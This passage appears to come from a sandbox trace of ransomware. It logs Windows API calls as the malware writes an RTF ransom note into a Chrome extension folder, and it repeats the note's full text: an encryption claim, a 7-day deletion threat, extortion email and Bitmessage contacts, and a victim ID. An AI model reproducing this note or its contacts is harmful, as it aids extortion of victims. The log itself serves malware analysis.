HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0272.039] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0272.321] CloseHandle (hObject=0x294) returned 1 [0272.322] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0272.322] GetLastError () returned 0x2 [0272.322] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0272.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0272.322] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou 